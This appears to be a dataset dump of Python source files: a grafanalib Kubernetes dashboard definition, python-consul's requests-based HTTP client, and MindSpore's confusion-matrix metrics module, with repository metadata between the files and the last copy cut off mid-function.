legend="{{instance}}: {{container}}",
),
d.Graph(
title="CPU usage by container",
targets=[
d.Target(
expr='sum(rate(container_cpu_usage_seconds_total{container!=""}[1m])) by (container, instance)',
legendFormat="{{instance}}: {{container}}",
),
d.Target(expr="machine_cpu_cores", legendFormat="limit"),
],
),
d.Graph(
title="memory usage by container",
targets=[
d.Target(
expr='sum(container_memory_usage_bytes{container!=""}) by (container, instance)',
legendFormat="{{instance}}: {{container}}",
),
d.Target(expr="machine_memory_bytes", legendFormat="limit"),
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.Graph(
title="memory working set by container",
targets=[
d.Target(
expr='sum(container_memory_working_set_bytes{container!=""}) by (container, instance)',
legendFormat="{{instance}}: {{container}}",
),
d.Target(expr="machine_memory_bytes", legendFormat="limit"),
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.Graph(
title="Network usage (bytes)",
targets=[
g.Target(
expr='rate(container_network_transmit_bytes_total{id="/"}[1m])',
legendFormat="{{instance}} transmit",
),
g.Target(
expr='rate(container_network_receive_bytes_total{id="/"}[1m])',
legendFormat="{{instance}} receive",
),
],
yAxes=g.single_y_axis(format=g.BYTES_PER_SEC_FORMAT),
),
d.Graph(
title="Network usage (packets)",
targets=[
g.Target(
expr='rate(container_network_transmit_packets_total{id="/"}[1m])',
legendFormat="{{instance}} transmit",
),
g.Target(
expr='rate(container_network_receive_packets_total{id="/"}[1m])',
legendFormat="{{instance}} receive",
),
],
),
d.Graph(
title="Network usage (avg packet size)",
targets=[
g.Target(
expr='rate(container_network_transmit_bytes_total{id="/"}[1m]) / rate(container_network_transmit_packets_total{id="/"}[1m])',
legendFormat="{{instance}} transmit",
),
g.Target(
expr='rate(container_network_receive_bytes_total{id="/"}[1m]) / rate(container_network_receive_packets_total{id="/"}[1m])',
legendFormat="{{instance}} receive",
),
],
yAxes=g.single_y_axis(format=g.BYTES_FORMAT),
),
d.Graph(
title="Network tcp segments",
targets=[
g.Target(
expr="sum(rate(node_netstat_Tcp_InSegs[1m])) by (instance)",
legendFormat="InSegs {{instance}}",
),
g.Target(
expr="sum(rate(node_netstat_Tcp_OutSegs[1m])) by (instance)",
legendFormat="OutSegs {{instance}}",
),
g.Target(
expr="sum(rate(node_netstat_Tcp_RetransSegs[1m])) by (instance)",
legendFormat="RetransSegs {{instance}}",
),
],
yAxes=g.single_y_axis(format=g.SHORT_FORMAT, logBase=10),
),
]
# The final dashboard must be named 'dashboard' so that grafanalib will find it.
dashboard = d.Dashboard(
title="Master dashboard",
refresh="",
rows=[
d.Row(title="API call latency", panels=API_CALL_LATENCY_PANELS),
d.Row(title="API call latency aggregated with quantile", panels=QUANTILE_API_CALL_LATENCY_PANELS, collapse=True),
d.Row(title="P&F metrics", panels=PAF_PANELS, collapse=True),
d.Row(title="Overall cluster health", panels=HEALTH_PANELS, collapse=True),
d.Row(title="etcd", panels=ETCD_PANELS, collapse=True),
d.Row(title="kube-apiserver", panels=APISERVER_PANELS, collapse=True),
d.Row(
title="kube-controller-manager",
panels=[
d.simple_graph(
"Workqueue depths",
'workqueue_depth{endpoint="kube-controller-manager"}',
legend="{{name}}",
)
],
collapse=True,
),
d.Row(title="Master VM", panels=VM_PANELS, collapse=True),
],
templating=g.Templating(
list=[
d.SOURCE_TEMPLATE,
g.Template(
name="etcd_type",
type="query",
dataSource="$source",
regex=r"\*\[+\]+(.*)",
query="label_values(etcd_request_duration_seconds_count, type)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
g.Template(
name="etcd_operation",
type="query",
dataSource="$source",
query="label_values(etcd_request_duration_seconds_count, operation)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
g.Template(
name="verb",
type="query",
dataSource="$source",
query="label_values(apiserver_request_duration_seconds_count, verb)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
g.Template(
name="resource",
type="query",
dataSource="$source",
regex="(.*)s",
query="label_values(apiserver_request_duration_seconds_count, resource)",
multi=True,
includeAll=True,
refresh=g.REFRESH_ON_TIME_RANGE_CHANGE,
),
]
),
).auto_panel_ids()
| true
| true
|
f705987652a631c2ebaab205528fe807cc950ac0
| 2,496
|
py
|
Python
|
consul/std.py
|
DataDog/python-consul
|
104c8c4fd6a0aa8ec24dd0fe911af815672602ca
|
[
"MIT"
] | null | null | null |
consul/std.py
|
DataDog/python-consul
|
104c8c4fd6a0aa8ec24dd0fe911af815672602ca
|
[
"MIT"
] | 1
|
2021-01-05T14:46:32.000Z
|
2021-01-05T14:46:32.000Z
|
consul/std.py
|
DataDog/python-consul
|
104c8c4fd6a0aa8ec24dd0fe911af815672602ca
|
[
"MIT"
] | null | null | null |
import requests
import os
from consul import base
__all__ = ["Consul"]
class HTTPClient(base.HTTPClient):
def __init__(self, *args, **kwargs):
self.timeout = kwargs.pop("timeout", None)
super(HTTPClient, self).__init__(*args, **kwargs)
self.session = requests.session()
self._pid = os.getpid()
def response(self, response):
response.encoding = "utf-8"
return base.Response(response.status_code, response.headers, response.text)
def _request(self, callback, uri, method, data, timeout=None):
self._renew_session_on_pid_change()
if timeout is None:
timeout = self.timeout
elif timeout <= 0:
timeout = None
return callback(
self.response(
self.session.request(
method,
url=uri,
verify=self.verify,
data=data,
cert=self.cert,
timeout=timeout,
)
)
)
def get(self, callback, path, params=None, timeout=None):
uri = self.uri(path, params)
return self._request(
callback, uri=uri, method="GET", data=None, timeout=timeout
)
def put(self, callback, path, params=None, data="", timeout=None):
uri = self.uri(path, params)
return self._request(
callback, uri=uri, method="PUT", data=data, timeout=timeout
)
def delete(self, callback, path, params=None, timeout=None):
uri = self.uri(path, params)
return self._request(
callback, uri=uri, method="DELETE", data=None, timeout=timeout
)
def post(self, callback, path, params=None, data="", timeout=None):
uri = self.uri(path, params)
return self._request(
callback, uri=uri, method="POST", data=data, timeout=timeout
)
def _renew_session_on_pid_change(self):
""" Check if the pid has changed and create new session if it has"""
if self.check_pid:
pid = os.getpid()
if pid == self._pid:
return
self._pid = pid
self.session = requests.session()
class Consul(base.Consul):
def connect(
self, host, port, scheme, verify=True, cert=None, timeout=None, check_pid=False
):
return HTTPClient(
host, port, scheme, verify, cert, timeout=timeout, check_pid=check_pid
)
| 30.814815
| 87
| 0.567708
|
import requests
import os
from consul import base
__all__ = ["Consul"]
class HTTPClient(base.HTTPClient):
def __init__(self, *args, **kwargs):
self.timeout = kwargs.pop("timeout", None)
super(HTTPClient, self).__init__(*args, **kwargs)
self.session = requests.session()
self._pid = os.getpid()
def response(self, response):
response.encoding = "utf-8"
return base.Response(response.status_code, response.headers, response.text)
def _request(self, callback, uri, method, data, timeout=None):
self._renew_session_on_pid_change()
if timeout is None:
timeout = self.timeout
elif timeout <= 0:
timeout = None
return callback(
self.response(
self.session.request(
method,
url=uri,
verify=self.verify,
data=data,
cert=self.cert,
timeout=timeout,
)
)
)
def get(self, callback, path, params=None, timeout=None):
uri = self.uri(path, params)
return self._request(
callback, uri=uri, method="GET", data=None, timeout=timeout
)
def put(self, callback, path, params=None, data="", timeout=None):
uri = self.uri(path, params)
return self._request(
callback, uri=uri, method="PUT", data=data, timeout=timeout
)
def delete(self, callback, path, params=None, timeout=None):
uri = self.uri(path, params)
return self._request(
callback, uri=uri, method="DELETE", data=None, timeout=timeout
)
def post(self, callback, path, params=None, data="", timeout=None):
uri = self.uri(path, params)
return self._request(
callback, uri=uri, method="POST", data=data, timeout=timeout
)
def _renew_session_on_pid_change(self):
if self.check_pid:
pid = os.getpid()
if pid == self._pid:
return
self._pid = pid
self.session = requests.session()
class Consul(base.Consul):
def connect(
self, host, port, scheme, verify=True, cert=None, timeout=None, check_pid=False
):
return HTTPClient(
host, port, scheme, verify, cert, timeout=timeout, check_pid=check_pid
)
| true
| true
|
f7059973a4d9a361ba270c09265b9b2266bf6ff4
| 27,261
|
py
|
Python
|
mindspore/nn/metrics/confusion_matrix.py
|
kungfu-team/mindspore-bert
|
71501cf52ae01db9d6a73fb64bcfe68a6509dc32
|
[
"Apache-2.0"
] | null | null | null |
mindspore/nn/metrics/confusion_matrix.py
|
kungfu-team/mindspore-bert
|
71501cf52ae01db9d6a73fb64bcfe68a6509dc32
|
[
"Apache-2.0"
] | null | null | null |
mindspore/nn/metrics/confusion_matrix.py
|
kungfu-team/mindspore-bert
|
71501cf52ae01db9d6a73fb64bcfe68a6509dc32
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""ConfusionMatrixMetric & ConfusionMatrix."""
import numpy as np
from mindspore._checkparam import Validator as validator
from .metric import Metric
class ConfusionMatrix(Metric):
r"""
Computes the confusion matrix. The performance matrix of measurement classification model is the model whose output
is binary or multi class. The confusion matrix is calculated. An array of shape [BC4] is returned.
The third dimension represents each channel of each sample in the input batch.Where B is the batch size and C is
the number of classes to be calculated.
If you only want to find confusion matrix, use this class. If you want to find 'PPV', 'TPR', 'TNR', etc., use class
'mindspore.metrics.ConfusionMatrixMetric'.
Args:
num_classes (int): Number of classes in the dataset.
normalize (str): The parameter of calculating ConfusionMatrix supports four Normalization modes, Choose from:
- **'no_norm'** (None) - No normalization is used. Default: None.
- **'target'** (str) - Normalization based on target value.
- **'prediction'** (str) - Normalization based on predicted value.
- **'all'** (str) - Normalization over the whole matrix.
threshold (float): A threshold, which is used to compare with the input tensor. Default: 0.5.
Examples:
>>> x = Tensor(np.array([1, 0, 1, 0]))
>>> y = Tensor(np.array([1, 0, 0, 1]))
>>> metric = nn.ConfusionMatrix(num_classes=2, normalize="no_norm", threshold=0.5)
>>> metric.clear()
>>> metric.update(x, y)
>>> output = metric.eval()
>>> print(output)
[[1. 1.]
[1. 1.]]
"""
TARGET = "target"
PREDICTION = "prediction"
ALL = "all"
NO_NORM = "no_norm"
def __init__(self, num_classes, normalize=NO_NORM, threshold=0.5):
super(ConfusionMatrix, self).__init__()
self.num_classes = validator.check_value_type("num_classes", num_classes, [int])
if normalize != ConfusionMatrix.TARGET and normalize != ConfusionMatrix.PREDICTION and \
normalize != ConfusionMatrix.ALL and normalize is not ConfusionMatrix.NO_NORM:
raise ValueError(
'The normalize way should be in [all, prediction, label, None], but got {}.'.format(normalize)
)
self.normalize = normalize
self.threshold = validator.check_value_type("threshold", threshold, [float])
self.clear()
def clear(self):
"""Clears the internal evaluation result."""
self.confusion_matrix = np.zeros((self.num_classes, self.num_classes))
self._is_update = False
def update(self, *inputs):
"""
Update state with y_pred and y.
Args:
inputs: Input `y_pred` and `y`. `y_pred` and `y` are a `Tensor`, a list or an array.
`y_pred` is the predicted value, `y` is the true value.
The shape of `y_pred` is :math:`(N, C, ...)` or :math:`(N, ...)`.
The shape of `y` is :math:`(N, ...)`.
Raises:
ValueError: If the number of the inputs is not 2.
"""
if len(inputs) != 2:
raise ValueError('ConfusionMatrix need 2 inputs (y_pred, y), but got {}.'.format(len(inputs)))
y_pred = self._convert_data(inputs[0])
y = self._convert_data(inputs[1])
if not (y_pred.ndim == y.ndim or y_pred.ndim == y.ndim + 1):
raise ValueError("y_pred and y should have the same number of dimensions, or the dimension of y_pred "
"equals the dimension of y add 1.")
if y_pred.ndim == y.ndim + 1:
y_pred = np.argmax(y_pred, axis=1)
if y_pred.ndim == y.ndim and y_pred.dtype in (np.float16, np.float32, np.float64):
y_pred = (y_pred >= self.threshold).astype(int)
trans = (y.reshape(-1) * self.num_classes + y_pred.reshape(-1)).astype(int)
bincount = np.bincount(trans, minlength=self.num_classes ** 2)
confusion_matrix = bincount.reshape(self.num_classes, self.num_classes)
self.confusion_matrix += confusion_matrix
self._is_update = True
def eval(self):
"""
Computes confusion matrix.
Returns:
numpy.ndarray, the computed result.
"""
if not self._is_update:
raise RuntimeError('Call the update method before calling eval.')
confusion_matrix = self.confusion_matrix.astype(float)
matrix_target = confusion_matrix / confusion_matrix.sum(axis=1, keepdims=True)
matrix_pred = confusion_matrix / confusion_matrix.sum(axis=0, keepdims=True)
matrix_all = confusion_matrix / confusion_matrix.sum()
normalize_dict = {ConfusionMatrix.TARGET: matrix_target,
ConfusionMatrix.PREDICTION: matrix_pred,
ConfusionMatrix.ALL: matrix_all}
if self.normalize == ConfusionMatrix.NO_NORM:
return confusion_matrix
matrix = normalize_dict.get(self.normalize)
if matrix[np.isnan(matrix)].size != 0:
matrix[np.isnan(matrix)] = 0
return matrix
class ConfusionMatrixMetric(Metric):
r"""
The performance matrix of measurement classification model is the model whose output is binary or multi class.
The correlation measure of confusion matrix was calculated from the full-scale tensor, and the average values of
batch, class channel and iteration were collected. This function supports the calculation of all measures described
below: the metric name in parameter metric_name.
If you want to use confusion matrix to calculate, such as 'PPV', 'TPR', 'TNR', use this class.
If you only want to calculate confusion matrix, please use 'mindspore.metrics.ConfusionMatrix'.
Args:
skip_channel (bool): Whether to skip the measurement calculation on the first channel of the predicted output.
Default: True.
metric_name (str): The names of indicators are in the following range. Of course, you can also set the industry
common aliases for these indicators. Choose from:
["sensitivity", "specificity", "precision", "negative predictive value", "miss rate",
"fall out", "false discovery rate", "false omission rate", "prevalence threshold",
"threat score", "accuracy", "balanced accuracy", "f1 score",
"matthews correlation coefficient", "fowlkes mallows index", "informedness", "markedness"].
calculation_method (bool): If true, the measurement for each sample is calculated first. If it is false, the
confusion matrix of all samples is accumulated first. As for classification task,
'calculation_method' should be False. Default: False.
decrease (str): Define the mode to reduce the calculation result of one batch of data. Decrease is used only if
calculation_method is True. Default: "mean". Choose from:
["none", "mean", "sum", "mean_batch", "sum_batch", "mean_channel", "sum_channel"].
Examples:
>>> metric = ConfusionMatrixMetric(skip_channel=True, metric_name="tpr",
... calculation_method=False, decrease="mean")
>>> metric.clear()
>>> x = Tensor(np.array([[[0], [1]], [[1], [0]]]))
>>> y = Tensor(np.array([[[0], [1]], [[0], [1]]]))
>>> metric.update(x, y)
>>> x = Tensor(np.array([[[0], [1]], [[1], [0]]]))
>>> y = Tensor(np.array([[[0], [1]], [[1], [0]]]))
>>> avg_output = metric.eval()
>>> print(avg_output)
[0.5]
"""
def __init__(self,
skip_channel=True,
metric_name="sensitivity",
calculation_method=False,
decrease="mean"):
super(ConfusionMatrixMetric, self).__init__()
self.confusion_matrix = _ConfusionMatrix(skip_channel=skip_channel, metric_name=metric_name,
calculation_method=calculation_method, decrease=decrease)
self.skip_channel = validator.check_value_type("skip_channel", skip_channel, [bool])
self.calculation_method = validator.check_value_type("calculation_method", calculation_method, [bool])
self.metric_name = validator.check_value_type("metric_name", metric_name, [str])
decrease_list = ["none", "mean", "sum", "mean_batch", "sum_batch", "mean_channel", "sum_channel"]
decrease = validator.check_value_type("decrease", decrease, [str])
self.decrease = validator.check_string(decrease, decrease_list, "decrease")
self.clear()
def clear(self):
"""Clears the internal evaluation result."""
self._total_num = 0
self._class_num = 0
self._total_tp = 0.0
self._total_fp = 0.0
self._total_tn = 0.0
self._total_fn = 0.0
def update(self, *inputs):
"""
Update state with predictions and targets.
inputs:
Input `y_pred` and `y`. `y_pred` and `y` are a `Tensor`, a list or an array.
- **y_pred** (ndarray) - Input data to compute. It must be one-hot format and first dim is batch.
The shape of `y_pred` is :math:`(N, C, ...)` or :math:`(N, ...)`.
As for classification tasks, `y_pred` should has the shape [BN] where N is larger than 1.
As for segmentation tasks, the shape should be [BNHW] or [BNHWD].
- **y** (ndarray) - Compute the true value of the measure. It must be one-hot format and first dim is batch.
The shape of `y` is :math:`(N, C, ...)`.
Raises:
ValueError: If the number of the inputs is not 2.
"""
if len(inputs) != 2:
raise ValueError('ConfusionMatrixMetric need 2 inputs (y_pred, y), but got {}.'.format(len(inputs)))
y_pred = self._convert_data(inputs[0])
y = self._convert_data(inputs[1])
if self.calculation_method is True:
score, not_nans = self.confusion_matrix(y_pred, y)
not_nans = int(not_nans.item())
self._total_num += score.item() * not_nans
self._class_num += not_nans
else:
confusion_matrix = self.confusion_matrix(y_pred, y)
confusion_matrix, _ = _decrease_metric(confusion_matrix, "sum")
self._total_tp += confusion_matrix[0].item()
self._total_fp += confusion_matrix[1].item()
self._total_tn += confusion_matrix[2].item()
self._total_fn += confusion_matrix[3].item()
def eval(self):
"""
Computes confusion matrix metric.
Returns:
ndarray, the computed result.
"""
if self.calculation_method is True:
if self._class_num == 0:
raise RuntimeError("ConfusionMatrixMetric must have at least one example before it can be computed.")
return self._total_num / self._class_num
confusion_matrix = np.array([self._total_tp, self._total_fp, self._total_tn, self._total_fn])
return _compute_confusion_matrix_metric(self.metric_name, confusion_matrix)
class _ConfusionMatrix:
"""
Compute confusion matrix related metrics.
Args:
skip_channel (bool): Whether to skip the measurement calculation on the first channel of the predicted
output. Default: True.
metric_name (str): The names of indicators are in the following range. Of course, you can also set the industry
common aliases for these indicators.
calculation_method (bool): If true, the measurement for each sample is calculated first. If it is false, the
confusion matrix for each image (the output of function '_get_confusion_matrix')
will be returned. In this way, users should achieve the confusion matrixes for all
images during an epochand then use '_compute_confusion_matrix_metric' to calculate
the metric. Default: False.
decrease (Union[DecreaseMetric, str]): ["none", "mean", "sum", "mean_batch", "sum_batch", "mean_channel",
"sum_channel"]
Define the mode to reduce the calculation result of one batch of data.
Decrease is used only if calculation_method is True. Default: "mean".
"""
def __init__(self, skip_channel=True, metric_name="hit_rate", calculation_method=False,
decrease="mean"):
super().__init__()
self.skip_channel = skip_channel
self.metric_name = metric_name
self.calculation_method = calculation_method
self.decrease = decrease
def __call__(self, y_pred, y):
"""
'y_preds' is expected to have binarized predictions and 'y' should be in one-hot format.
Args:
- **y_pred** (ndarray) - Input data to compute. It must be one-hot format and first dim is batch.
- **y** (ndarray) - Ground truth to compute the metric. It must be one-hot format and first dim is batch.
Raises:
ValueError: If `metric_name` is empty.
ValueError: when `y_pred` has less than two dimensions.
"""
if not np.all(y.astype(np.uint8) == y):
raise ValueError("y should be a binarized ndarray.")
dims = y_pred.ndim
if dims < 2:
raise ValueError("y_pred should have at least two dimensions.")
if dims == 2 or (dims == 3 and y_pred.shape[-1] == 1):
if self.calculation_method:
self.calculation_method = False
confusion_matrix = _get_confusion_matrix(y_pred=y_pred, y=y, skip_channel=self.skip_channel)
if self.calculation_method:
if isinstance(self.metric_name, str):
confusion_matrix = _compute_confusion_matrix_metric(self.metric_name, confusion_matrix)
chart, not_nans = _decrease_metric(confusion_matrix, self.decrease)
return chart, not_nans
if not self.metric_name:
raise ValueError("There should be at least one metric name.")
results = []
for metric_name in self.metric_name:
sub_confusion_matrix = _compute_confusion_matrix_metric(metric_name, confusion_matrix)
chart, not_nans = _decrease_metric(sub_confusion_matrix, self.decrease)
results.append(chart)
results.append(not_nans)
return results
return confusion_matrix
def _get_confusion_matrix(y_pred, y, skip_channel=True):
"""
The confusion matrix is calculated. An array of shape [BC4] is returned. The third dimension represents each channel
of each sample in the input batch.Where B is the batch size and C is the number of classes to be calculated.
Args:
y_pred (ndarray): input data to compute. It must be one-hot format and first dim is batch.
The values should be binarized.
y (ndarray): ground truth to compute the metric. It must be one-hot format and first dim is batch.
The values should be binarized.
skip_channel (bool): whether to skip metric computation on the first channel of the predicted output.
Default: True.
Raises:
ValueError: when `y_pred` and `y` have different shapes.
"""
if not skip_channel:
y = y[:, 1:] if y.shape[1] > 1 else y
y_pred = y_pred[:, 1:] if y_pred.shape[1] > 1 else y_pred
y = y.astype(float)
y_pred = y_pred.astype(float)
validator.check('y_shape', y.shape, 'y_pred_shape', y_pred.shape)
batch_size, n_class = y_pred.shape[:2]
y_pred = y_pred.reshape(batch_size, n_class, -1)
y = y.reshape(batch_size, n_class, -1)
tp = ((y_pred + y) == 2).astype(float)
tn = ((y_pred + y) == 0).astype(float)
tp = tp.sum(axis=2)
tn = tn.sum(axis=2)
p = y.sum(axis=2)
n = y.shape[-1] - p
fn = p - tp
fp = n - tn
return np.stack([tp, fp, tn, fn], axis=-1)
def _decrease_mean(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = np.where(not_nans > 0, chart.sum(axis=1) / not_nans, np.zeros(1, dtype=float))
not_nans = (not_nans > 0).astype(float).sum(axis=0)
chart = np.where(not_nans > 0, chart.sum(axis=0) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum(not_nans, chart):
not_nans = not_nans.sum(axis=(0, 1))
chart = np.sum(chart, axis=(0, 1))
return not_nans, chart
def _decrease_mean_batch(not_nans, chart):
not_nans = not_nans.sum(axis=0)
chart = np.where(not_nans > 0, chart.sum(axis=0) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum_batch(not_nans, chart):
not_nans = not_nans.sum(axis=0)
chart = chart.sum(axis=0)
return not_nans, chart
def _decrease_mean_channel(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = np.where(not_nans > 0, chart.sum(axis=1) / not_nans, np.zeros(1, dtype=float))
return not_nans, chart
def _decrease_sum_channel(not_nans, chart):
not_nans = not_nans.sum(axis=1)
chart = chart.sum(axis=1)
return not_nans, chart
def _decrease_none(not_nans, chart):
return not_nans, chart
def _decrease_metric(chart, decrease="mean"):
"""
This function is used to reduce the calculated metrics for each class of each example.
Args:
chart (ndarray): A data table containing the calculated measurement scores for each batch and class.
The first two dims should be batch and class.
decrease (str): Define the mode to reduce computation result of 1 batch data. Decrease will only be employed
when 'calculation_method' is True. Default: "mean".
"""
nans = np.isnan(chart)
not_nans = (~nans).astype(float)
chart[nans] = 0
decrease_dict = {"mean": _decrease_mean(not_nans, chart),
"sum": _decrease_sum(not_nans, chart),
"mean_batch": _decrease_mean_batch,
"sum_batch": _decrease_sum_batch(not_nans, chart),
"mean_channel": _decrease_mean_channel(not_nans, chart),
"sum_channel": _decrease_sum_channel(not_nans, chart),
"none": _decrease_none(not_nans, chart)}
not_nans, chart = decrease_dict.get(decrease)
return chart, not_nans
def _calculate_tpr(tp, p):
"""Calculate tpr."""
return tp, p
def _calculate_tnr(tn, n):
"""Calculate tnr."""
return tn, n
def _calculate_ppv(tp, fp):
"""Calculate ppv."""
return tp, (tp + fp)
def _calculate_npv(tn, fn):
"""Calculate npv."""
return tn, (tn + fn)
def _calculate_fnr(fn, p):
"""Calculate fnr."""
return fn, p
def _calculate_fpr(fp, n):
"""Calculate fpr."""
return fp, n
def _calculate_fdr(tp, fp):
"""Calculate fdr."""
return fp, (fp + tp)
def _calculate_for(tn, fn):
"""Calculate for."""
return fn, (fn + tn)
def _calculate_pt(tp, tn, p, n):
"""Calculate pt."""
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator = np.sqrt(tpr * (1.0 - tnr)) + tnr - 1.0
denominator = tpr + tnr - 1.0
return numerator, denominator
def _calculate_ts(tp, fp, fn):
"""Calculate ts."""
return tp, (tp + fn + fp)
def _calculate_acc(tp, tn, p, n):
"""Calculate acc."""
return (tp + tn), (p + n)
def _calculate_ba(tp, tn, p, n):
"""Calculate ba."""
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator, denominator = (tpr + tnr), 2.0
return numerator, denominator
def _calculate_f1(tp, fp, fn):
"""Calculate f1."""
return tp * 2.0, (tp * 2.0 + fn + fp)
def _calculate_mcc(tp, fp, tn, fn):
"""Calculate mcc."""
numerator = tp * tn - fp * fn
denominator = np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
return numerator, denominator
def _calculate_fm(tp, fp, p):
"""Calculate fm."""
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
ppv = np.where((tp + fp) > 0, tp / (tp + fp), np.array(float("nan")))
numerator = np.sqrt(ppv * tpr)
denominator = 1.0
return numerator, denominator
def _calculate_bm(tp, tn, p, n):
"""Calculate bm."""
tpr = np.where(p > 0, tp / p, np.array(float("nan")))
tnr = np.where(n > 0, tn / n, np.array(float("nan")))
numerator = tpr + tnr - 1.0
denominator = 1.0
return numerator, denominator
def _calculate_mk(tp, fp, tn, fn):
"""Calculate mk."""
ppv = np.where((tp + fp) > 0, tp / (tp + fp), np.array(float("nan")))
npv = np.where((tn + fn) > 0, tn / (tn + fn), np.array(float("nan")))
npv = tn / (tn + fn)
numerator = ppv + npv - 1.0
denominator = 1.0
return numerator, denominator
def _compute_confusion_matrix_metric(metric_name, confusion_matrix):
"""
This function is used to compute confusion matrix related metric.
Args:
metric_name (str): Refer to conflusionmatrixmetric 'metric_name'. Some of the metrics have multiple aliases
(as shown in the wikipedia page aforementioned), and you can also input those names instead.
confusion_matrix (ndarray): Refer to '_get_confusion_matrix'.
Raises:
ValueError: when the size of the last dimension of confusion_matrix is not 4.
NotImplementedError: when specify a not implemented metric_name.
"""
metric = _check_metric_name(metric_name)
input_dim = confusion_matrix.ndim
if input_dim == 1:
confusion_matrix = np.expand_dims(confusion_matrix, 0)
if confusion_matrix.shape[-1] != 4:
raise ValueError("The size of the last dimension of confusion_matrix should be 4.")
tp = confusion_matrix[..., 0]
fp = confusion_matrix[..., 1]
tn = confusion_matrix[..., 2]
fn = confusion_matrix[..., 3]
p = tp + fn
n = fp + tn
metric_name_dict = {"tpr": _calculate_tpr(tp, p),
"tnr": _calculate_tnr(tn, n),
"ppv": _calculate_ppv(tp, fp),
"npv": _calculate_npv(tn, fn),
"fnr": _calculate_fnr(fn, p),
"fpr": _calculate_fpr(fp, n),
"fdr": _calculate_fdr(tp, fp),
"for": _calculate_for(tn, fn),
"pt": _calculate_pt(tp, tn, p, n),
"ts": _calculate_ts(tp, fp, fn),
"acc": _calculate_acc(tp, tn, p, n),
"ba": _calculate_ba(tp, tn, p, n),
"f1": _calculate_f1(tp, fp, fn),
"mcc": _calculate_mcc(tp, fp, tn, fn),
"fm": _calculate_fm(tp, fp, p),
"bm": _calculate_bm(tp, tn, p, n),
"mk": _calculate_mk(tp, fp, tn, fn)
}
numerator, denominator = metric_name_dict.get(metric)
if isinstance(denominator, np.ndarray):
result = np.where(denominator != 0, numerator / denominator, np.array(float("nan")))
else:
result = numerator / denominator
return result
def _check_metric_name(metric_name):
"""
There are many metrics related to confusion matrix, and some of the metrics have more than one names. In addition,
some of the names are very long. Therefore, this function is used to check and simplify the name.
Returns:
Simplified metric name.
Raises:
NotImplementedError: when the metric is not implemented.
"""
metric_name = metric_name.replace(" ", "_")
metric_name = metric_name.lower()
metric_name_dict = {"sensitivity": "tpr",
"recall": "tpr",
"hit_rate": "tpr",
"true_positive_rate": "tpr",
"tpr": "tpr",
"specificity": "tnr",
"selectivity": "tnr",
"true_negative_rate": "tnr",
"tnr": "tnr",
"precision": "ppv",
"positive_predictive_value": "ppv",
"ppv": "ppv",
"negative_predictive_value": "npv",
"npv": "npv",
"miss_rate": "fnr",
"false_negative_rate": "fnr",
"fnr": "fnr",
"fall_out": "fpr",
"false_positive_rate": "fpr",
"fpr": "fpr",
"false_discovery_rate": "fdr",
"fdr": "fdr",
"false_omission_rate": "for",
"for": "for",
"prevalence_threshold": "pt",
"pt": "pt",
"threat_score": "ts",
"critical_success_index": "ts",
"ts": "ts",
"csi": "ts",
"accuracy": "acc",
"acc": "acc",
"balanced_accuracy": "ba",
"ba": "ba",
"f1_score": "f1",
"f1": "f1",
"matthews_correlation_coefficient": "mcc",
"mcc": "mcc",
"fowlkes_mallows_index": "fm",
"fm": "fm",
"informedness": "bm",
"bookmaker_informedness": "bm",
"bm": "bm",
"markedness": "mk",
"deltap": "mk",
"mk": "mk"
}
metric_name_info = metric_name_dict.get(metric_name)
if metric_name_info is None:
raise NotImplementedError("The metric is not implemented.")
return metric_name_info
| 39.739067
| 120
| 0.583874
|
import numpy as np
from mindspore._checkparam import Validator as validator
from .metric import Metric
class ConfusionMatrix(Metric):
TARGET = "target"
PREDICTION = "prediction"
ALL = "all"
NO_NORM = "no_norm"
def __init__(self, num_classes, normalize=NO_NORM, threshold=0.5):
super(ConfusionMatrix, self).__init__()
self.num_classes = validator.check_value_type("num_classes", num_classes, [int])
if normalize != ConfusionMatrix.TARGET and normalize != ConfusionMatrix.PREDICTION and \
normalize != ConfusionMatrix.ALL and normalize is not ConfusionMatrix.NO_NORM:
raise ValueError(
'The normalize way should be in [all, prediction, label, None], but got {}.'.format(normalize)
)
self.normalize = normalize
self.threshold = validator.check_value_type("threshold", threshold, [float])
self.clear()
def clear(self):
self.confusion_matrix = np.zeros((self.num_classes, self.num_classes))
self._is_update = False
def update(self, *inputs):
if len(inputs) != 2:
raise ValueError('ConfusionMatrix need 2 inputs (y_pred, y), but got {}.'.format(len(inputs)))
y_pred = self._convert_data(inputs[0])
y = self._convert_data(inputs[1])
if not (y_pred.ndim == y.ndim or y_pred.ndim == y.ndim + 1):
raise ValueError("y_pred and y should have the same number of dimensions, or the dimension of y_pred "
"equals the dimension of y add 1.")
if y_pred.ndim == y.ndim + 1:
y_pred = np.argmax(y_pred, axis=1)
if y_pred.ndim == y.ndim and y_pred.dtype in (np.float16, np.float32, np.float64):
y_pred = (y_pred >= self.threshold).astype(int)
trans = (y.reshape(-1) * self.num_classes + y_pred.reshape(-1)).astype(int)
bincount = np.bincount(trans, minlength=self.num_classes ** 2)
confusion_matrix = bincount.reshape(self.num_classes, self.num_classes)
self.confusion_matrix += confusion_matrix
self._is_update = True
def eval(self):
if not self._is_update:
raise RuntimeError('Call the update method before calling eval.')
confusion_matrix = self.confusion_matrix.astype(float)
